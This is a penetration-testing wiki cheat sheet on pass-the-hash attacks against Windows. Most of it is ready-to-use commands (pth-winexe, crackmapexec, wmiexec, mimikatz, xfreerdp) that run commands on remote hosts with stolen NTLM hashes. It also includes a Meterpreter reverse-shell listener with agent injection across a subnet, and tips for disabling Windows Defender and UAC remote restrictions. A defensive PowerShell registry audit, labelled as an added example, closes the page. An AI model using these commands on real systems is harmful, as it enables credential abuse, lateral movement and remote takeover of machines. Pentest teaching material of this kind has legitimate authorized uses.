PTH: Pass the hash

From pentestwiki.org

Requirement:

SMB connections over ports 139/445 to a writeable share (e.g. C$, admin$)

Linux

SMB

root #pth-winexe -U <DOMAIN>/administrator%<LM HASH>:<NT HASH> //$IP cmd
root #crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
root #python wmiexec.py -hashes :$HASH $USER@$HOST


MS SQL

root #pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty


RDP

root #xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389


Metasploit

msf>use exploit/windows/smb/psexec


Crackmapexec + Meterpreter

First, start meterpreter listener:

msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set LHOST $LOCALIP
msf>set LPORT 444
msf>set exitonsession false
msf>exploit -j


root #crackmapexec $IP -u administrator -p $PASS -M metinject -o LHOST=$LOCALIP LPORT=444


Crackmapexec + Empire

root #python empire --rest --user empireadmin --pass Password123!


Edit ~/.cme/cme.conf:

[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123

root #crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test


Windows

For Windows, use mimikatz or Impacket's wmiexec.

PTH with mimikatz:

C:\>mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH


That should open a cmd.exe on the target machine.

Check hashes against network

root #medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
root #crackmapexec $IP/24 -u Administrator -H $HASH


2018 update

Problems with defence systems: UAC, SMB signing, WDigest, Credential Guard

SMB signing: STATUS_ACCESS_DENIED may mean the server requires signed SMB sessions. The setting is
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0 (0 = signing not required, 1 = required)


WDigest authentication (clear-text credential caching in LSASS):
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential" (1 = clear-text credentials kept, 0 = disabled; 0 is the default since Windows 8.1 / Server 2012 R2)

UAC remote restrictions for local administrators:
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy" = 1 (1 disables the restriction; see below)


Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against it: you would not even be able to pass the Administrator hash. You would need to turn off Windows Defender first.

Additionally, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and creating a DWORD entry named LocalAccountTokenFilterPolicy with a value of 1.
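From the defender's side, the three registry settings listed above can be audited on a host to see whether it is in the hardened state. The following PowerShell is an added example, not from pentestwiki.org; it assumes the key paths and value names exactly as given on this page and the hypothetical function name Get-PthHardeningStatus, and it must run in an elevated session.

```powershell
# Added example (not from pentestwiki.org): audit the registry settings this page lists
# from a defender's point of view. Assumes the key paths/value names as given on the page.
$checks = @(
    @{
        Name     = 'SMB signing required (LanManServer)'
        Path     = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
        Value    = 'RequireSecuritySignature'
        Hardened = 1        # 1 = server requires signed SMB sessions
        Default  = 0        # absent/0 on member servers and workstations: not required
    },
    @{
        Name     = 'WDigest clear-text credential caching disabled'
        Path     = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
        Value    = 'UseLogonCredential'
        Hardened = 0        # 0 = LSASS does not keep clear-text WDigest credentials
        Default  = 0        # absent means 0 on Windows 8.1 / Server 2012 R2 and later
    },
    @{
        Name     = 'UAC remote restrictions for local admins in force'
        Path     = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
        Value    = 'LocalAccountTokenFilterPolicy'
        Hardened = 0        # 0/absent = non-RID-500 local admins get a filtered token remotely
        Default  = 0
    }
)

function Get-PthHardeningStatus {
    foreach ($c in $checks) {
        $item = Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue
        if ($null -eq $item) {
            $current = $c.Default     # value not set: Windows applies its built-in default
            $source  = 'default'
        } else {
            $current = [int]$item.($c.Value)
            $source  = 'registry'
        }
        [pscustomobject]@{
            Check    = $c.Name
            Current  = $current
            Source   = $source
            Hardened = ($current -eq $c.Hardened)
        }
    }
}

Get-PthHardeningStatus | Format-Table -AutoSize
```

Any row with Hardened = False is a setting worth reviewing against the explanation above; Credential Guard is not a registry value and is not covered by this check.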